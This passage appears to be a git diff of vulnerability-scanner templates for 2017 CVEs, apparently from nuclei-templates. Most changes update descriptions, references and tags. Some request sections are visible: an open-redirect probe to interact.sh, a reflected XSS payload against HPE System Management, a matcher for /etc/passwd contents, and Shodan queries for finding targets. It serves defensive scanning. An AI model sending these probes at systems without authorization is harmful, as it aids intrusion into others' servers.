+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-12138
+ cwe-id: CWE-601
+ tags: cve,cve2017,redirect,xoops,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /user.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
+
+ - |
+ GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml
index 01f2e0f6f9..a9cd3220db 100644
--- a/cves/2017/CVE-2017-12149.yaml
+++ b/cves/2017/CVE-2017-12149.yaml
@@ -4,17 +4,18 @@ info:
name: Jboss Application Server - Remote Code Execution
author: fopina
severity: critical
- description: "Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data."
+ description: Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference:
- https://chowdera.com/2020/12/20201229190934023w.html
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149
+ - https://bugzilla.redhat.com/show_bug.cgi?id=1486220
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-12149
cwe-id: CWE-502
- tags: cve,cve2017,jboss,java,rce,deserialization
+ tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss
requests:
- raw:
diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml
index e177b04912..22e1e6690d 100644
--- a/cves/2017/CVE-2017-12542.yaml
+++ b/cves/2017/CVE-2017-12542.yaml
@@ -8,11 +8,13 @@ info:
reference:
- https://www.exploit-db.com/exploits/44005
- https://nvd.nist.gov/vuln/detail/CVE-2017-12542
+ - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
+ - https://www.exploit-db.com/exploits/44005/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
+ cvss-score: 10
cve-id: CVE-2017-12542
- tags: cve,cve2017,ilo4,hpe,auth-bypass
+ tags: ilo4,hpe,auth-bypass,edb,cve,cve2017
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-12544.yaml b/cves/2017/CVE-2017-12544.yaml
index 33051417f0..f6ca7ef1ca 100644
--- a/cves/2017/CVE-2017-12544.yaml
+++ b/cves/2017/CVE-2017-12544.yaml
@@ -1,37 +1,40 @@
-id: CVE-2017-12544
+id: CVE-2017-12544
-info:
- name: HPE System Management - XSS
- author: divya_mudgal
- severity: medium
- description: Reflected Cross-site scripting (XSS) on HPE System Management
- reference:
- - https://seclists.org/fulldisclosure/2018/Mar/5
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12544
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 5.4
- cve-id: CVE-2017-12544
- cwe-id: CWE-79
- tags: cve,cve2017,xss,hp
+info:
+ name: HPE System Management - Cross-Site Scripting
+ author: divya_mudgal
+ severity: medium
+ description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ reference:
+ - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us
+ - http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12544
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2017-12544
+ cwe-id: CWE-79
+ tags: cve,cve2017,xss,hp
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "var prodName = '';prompt`document.domain`;//';"
- part: body
-
- - type: word
- words:
- - "text/html"
- part: header
-
- - type: status
- status:
- - 200
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "var prodName = '';prompt`document.domain`;//';"
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-12583.yaml b/cves/2017/CVE-2017-12583.yaml
index 3fcc19e269..4d088e27f0 100644
--- a/cves/2017/CVE-2017-12583.yaml
+++ b/cves/2017/CVE-2017-12583.yaml
@@ -1,12 +1,13 @@
id: CVE-2017-12583
info:
- name: Reflected XSS in doku.php
+ name: DokuWiki - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
- description: DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php.
+ description: DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/splitbrain/dokuwiki/issues/2061
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12583
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml
index 97c997a6bd..39a22529cf 100644
--- a/cves/2017/CVE-2017-12611.yaml
+++ b/cves/2017/CVE-2017-12611.yaml
@@ -8,6 +8,7 @@ info:
reference:
- https://struts.apache.org/docs/s2-053.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-12611
+ - https://kb.netapp.com/support/s/article/ka51A000000CgttQAC/NTAP-20170911-0001
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml
index c95a8798bb..ad6f801c1f 100644
--- a/cves/2017/CVE-2017-12615.yaml
+++ b/cves/2017/CVE-2017-12615.yaml
@@ -1,22 +1,25 @@
id: CVE-2017-12615
info:
- name: Apache Tomcat RCE
+ name: Apache Tomcat Servers - Remote Code Execution
author: pikpikcu
severity: high
description: |
- By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
- This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
- However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
- Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
+ Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
reference:
- https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
+ - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
+ - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12615
+ - http://web.archive.org/web/20210616200000/https://www.securityfocus.com/bid/100901
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-12615
cwe-id: CWE-434
- tags: cve,cve2017,apache,rce,tomcat
+ metadata:
+ shodan-query: title:"Apache Tomcat"
+ tags: rce,tomcat,kev,cisa,vulhub,cve,cve2017,apache,fileupload
requests:
- method: PUT
@@ -54,3 +57,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml
index d82f48e3e5..bab23dc8e6 100644
--- a/cves/2017/CVE-2017-12629.yaml
+++ b/cves/2017/CVE-2017-12629.yaml
@@ -4,7 +4,7 @@ info:
name: Apache Solr <= 7.1 - XML Entity Injection
author: dwisiswant0
severity: critical
- description: "Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr."
+ description: Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.
reference:
- https://twitter.com/honoki/status/1298636315613974532
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
@@ -15,7 +15,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2017-12629
cwe-id: CWE-611
- tags: cve,cve2017,solr,apache,oast,xxe
+ tags: oast,xxe,vulhub,cve,cve2017,solr,apache
requests:
- raw:
diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml
index 1464250a41..b13092717d 100644
--- a/cves/2017/CVE-2017-12635.yaml
+++ b/cves/2017/CVE-2017-12635.yaml
@@ -4,9 +4,12 @@ info:
name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation
author: pikpikcu
severity: critical
- description: "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges."
+ description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-12635
+ - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E
+ - http://web.archive.org/web/20210414010253/https://www.securityfocus.com/bid/101868
+ - https://security.gentoo.org/glsa/201711-16
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml
index 7819d5721c..b604037e5a 100644
--- a/cves/2017/CVE-2017-12637.yaml
+++ b/cves/2017/CVE-2017-12637.yaml
@@ -1,19 +1,21 @@
id: CVE-2017-12637
info:
- name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5
+ name: SAP NetWeaver Application Server Java 7.5 - Local File Inclusion
author: apt-mirror
severity: high
- description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
+ description: SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
reference:
- - https://www.cvedetails.com/cve/CVE-2017-12637/
- - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
- https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf
+ - http://www.sh0w.top/index.php/archives/7/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-12637
cwe-id: CWE-22
+ metadata:
+ shodan-query: http.favicon.hash:-266008933
tags: cve,cve2017,sap,lfi,java,traversal
requests:
@@ -31,3 +33,5 @@ requests:
- "META-INF"
condition: and
part: body
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml
index 206aa791ce..4e18ff6124 100644
--- a/cves/2017/CVE-2017-12794.yaml
+++ b/cves/2017/CVE-2017-12794.yaml
@@ -9,6 +9,8 @@ info:
reference:
- https://twitter.com/sec715/status/1406779605055270914
- https://nvd.nist.gov/vuln/detail/CVE-2017-12794
+ - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/
+ - http://web.archive.org/web/20211207172022/https://securitytracker.com/id/1039264
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
diff --git a/cves/2017/CVE-2017-14135.yaml b/cves/2017/CVE-2017-14135.yaml
index 5ec4d962b8..7fdc2e846d 100644
--- a/cves/2017/CVE-2017-14135.yaml
+++ b/cves/2017/CVE-2017-14135.yaml
@@ -4,11 +4,12 @@ info:
name: OpenDreambox 2.0.0 - Remote Code Execution
author: alph4byt3
severity: critical
- description: "OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py."
+ description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.
reference:
- https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
- https://www.exploit-db.com/exploits/42293
- https://nvd.nist.gov/vuln/detail/CVE-2017-14135
+ - https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@@ -16,7 +17,7 @@ info:
cwe-id: CWE-78
metadata:
shodan-query: title:"Dreambox WebControl"
- tags: cve,cve2017,dreambox,rce,oast
+ tags: cve2017,dreambox,rce,oast,edb,cve
requests:
- raw:
diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml
index d10ba2cf19..330df119bb 100644
--- a/cves/2017/CVE-2017-14535.yaml
+++ b/cves/2017/CVE-2017-14535.yaml
@@ -9,12 +9,13 @@ info:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
- https://nvd.nist.gov/vuln/detail/CVE-2017-14535
+ - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2017-14535
cwe-id: CWE-78
- tags: cve,cve2017,trixbox,rce,injection
+ tags: cve,cve2017,trixbox,rce,injection,edb
requests:
- raw:
diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml
index 780250d419..66f9cfe5ba 100644
--- a/cves/2017/CVE-2017-14537.yaml
+++ b/cves/2017/CVE-2017-14537.yaml
@@ -4,7 +4,7 @@ info:
name: Trixbox 2.8.0 - Path Traversal
author: pikpikcu
severity: medium
- description: "Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php."
+ description: Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
reference:
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml
index 401d1e3040..c4f88c893d 100644
--- a/cves/2017/CVE-2017-14651.yaml
+++ b/cves/2017/CVE-2017-14651.yaml
@@ -1,7 +1,7 @@
id: CVE-2017-14651
info:
- name: WSO2 Data Analytics Server 3.1.0 - Reflected Cross-Site Scripting
+ name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml
index 87a14fe679..c3af2970c4 100644
--- a/cves/2017/CVE-2017-14849.yaml
+++ b/cves/2017/CVE-2017-14849.yaml
@@ -1,14 +1,15 @@
id: CVE-2017-14849
info:
- name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
+ name: Node.js <8.6.0 - Directory Traversal
author: Random_Robbie
severity: high
- description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
+ description: Node.js before 8.6.0 allows remote attackers to access unintended files because a change to ".." handling is incompatible with the pathname validation used by unspecified community modules.
reference:
- https://twitter.com/nodejs/status/913131152868876288
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- - http://www.securityfocus.com/bid/101056
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-14849
+ - http://web.archive.org/web/20210423143109/https://www.securityfocus.com/bid/101056
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@@ -29,3 +30,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-15287.yaml b/cves/2017/CVE-2017-15287.yaml
index 144181dec3..916b9a90a9 100644
--- a/cves/2017/CVE-2017-15287.yaml
+++ b/cves/2017/CVE-2017-15287.yaml
@@ -15,7 +15,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2017-15287
cwe-id: CWE-79
- tags: cve,cve2017,xss,dreambox
+ tags: dreambox,edb,cve,cve2017,xss
requests:
- raw:
diff --git a/cves/2017/CVE-2017-15363.yaml b/cves/2017/CVE-2017-15363.yaml
index 1118798c3b..796d80f4f2 100644
--- a/cves/2017/CVE-2017-15363.yaml
+++ b/cves/2017/CVE-2017-15363.yaml
@@ -1,19 +1,22 @@
id: CVE-2017-15363
info:
- name: TYPO3 Restler - Arbitrary File Retrieval
+ name: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion
author: 0x_Akoko
severity: high
- description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
+ description: Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.
reference:
- https://www.exploit-db.com/exploits/42985
- https://www.cvedetails.com/cve/CVE-2017-15363
+ - https://extensions.typo3.org/extension/restler/
+ - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-15363
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-15363
- cwe-id: CWE-98
- tags: cve,cve2017,restler,lfi
+ cwe-id: CWE-22
+ tags: cve,cve2017,restler,lfi,edb
requests:
- method: GET
@@ -35,3 +38,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml
index f88570d322..c996105f8a 100644
--- a/cves/2017/CVE-2017-15647.yaml
+++ b/cves/2017/CVE-2017-15647.yaml
@@ -1,19 +1,21 @@
id: CVE-2017-15647
info:
- name: FiberHome - Directory Traversal
+ name: FiberHome Routers - Local File Inclusion
author: daffainfo
severity: high
- description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
+ description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
reference:
- https://www.exploit-db.com/exploits/44054
- https://www.cvedetails.com/cve/CVE-2017-15647
+ - https://blogs.securiteam.com/index.php/archives/3472
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-15647
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-15647
cwe-id: CWE-22
- tags: cve,cve2017,lfi,router
+ tags: lfi,router,edb,cve,cve2017
requests:
- method: GET
@@ -30,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml
index 52ffeccdfc..9f941c774b 100644
--- a/cves/2017/CVE-2017-15715.yaml
+++ b/cves/2017/CVE-2017-15715.yaml
@@ -1,19 +1,21 @@
id: CVE-2017-15715
info:
- name: Apache Arbitrary File Upload
+ name: Apache httpd <=2.4.29 - Arbitrary File Upload
author: geeknik
severity: high
- description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could
- be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
+ description: Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in , which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.
reference:
- https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ - http://www.openwall.com/lists/oss-security/2018/03/24/6
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-15715
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2017-15715
cwe-id: CWE-20
- tags: cve,cve2017,apache,httpd,fileupload
+ tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
requests:
- raw:
@@ -44,3 +46,5 @@ requests:
- type: dsl
dsl:
- 'contains(body_2, "{{randstr_1}}")'
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml
index ffbe9d78c8..48d1b07c67 100644
--- a/cves/2017/CVE-2017-15944.yaml
+++ b/cves/2017/CVE-2017-15944.yaml
@@ -14,7 +14,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-15944
- tags: cve,cve2017,rce,vpn,panos,globalprotect
+ tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect
requests:
- raw:
diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml
index 1e252161ac..56a9e56ab6 100644
--- a/cves/2017/CVE-2017-16806.yaml
+++ b/cves/2017/CVE-2017-16806.yaml
@@ -4,16 +4,18 @@ info:
name: Ulterius Server < 1.9.5.0 - Directory Traversal
author: geeknik
severity: high
- description: "Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs."
+ description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
reference:
- https://www.exploit-db.com/exploits/43141
- https://nvd.nist.gov/vuln/detail/CVE-2017-16806
+ - https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
+ - https://www.exploit-db.com/exploits/43141/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-16806
cwe-id: CWE-22
- tags: cve,cve2017,ulterius,traversal
+ tags: cve2017,ulterius,traversal,edb,cve
requests:
- method: GET
diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml
index 6e6dae4f21..af409d474a 100644
--- a/cves/2017/CVE-2017-16877.yaml
+++ b/cves/2017/CVE-2017-16877.yaml
@@ -1,12 +1,14 @@
id: CVE-2017-16877
info:
- name: Nextjs v2.4.1 LFI
+ name: Nextjs <2.4.1 - Local File Inclusion
author: pikpikcu
severity: high
- description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information.
+ description: ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information.
reference:
- https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
+ - https://github.com/zeit/next.js/releases/tag/2.4.1
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-16877
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@@ -31,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/09
diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml
index 4f4eeac75f..e50a8de23b 100644
--- a/cves/2017/CVE-2017-17043.yaml
+++ b/cves/2017/CVE-2017-17043.yaml
@@ -1,18 +1,21 @@
id: CVE-2017-17043
info:
- name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
+ name: WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
+ description: WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
reference:
+ - https://wordpress.org/support/topic/wordpress-emag-marketplace-connector-1-0-cross-site-scripting-vulnerability/
+ - https://packetstormsecurity.com/files/145060/wpemagmc10-xss.txt
+ - https://wpvulndb.com/vulnerabilities/8964
- https://nvd.nist.gov/vuln/detail/CVE-2017-17043
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-17043
cwe-id: CWE-79
- tags: cve,cve2017,wordpress,xss,wp-plugin
+ tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress
requests:
- method: GET
@@ -34,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml
index c49c222a32..a2e97ad00d 100644
--- a/cves/2017/CVE-2017-17059.yaml
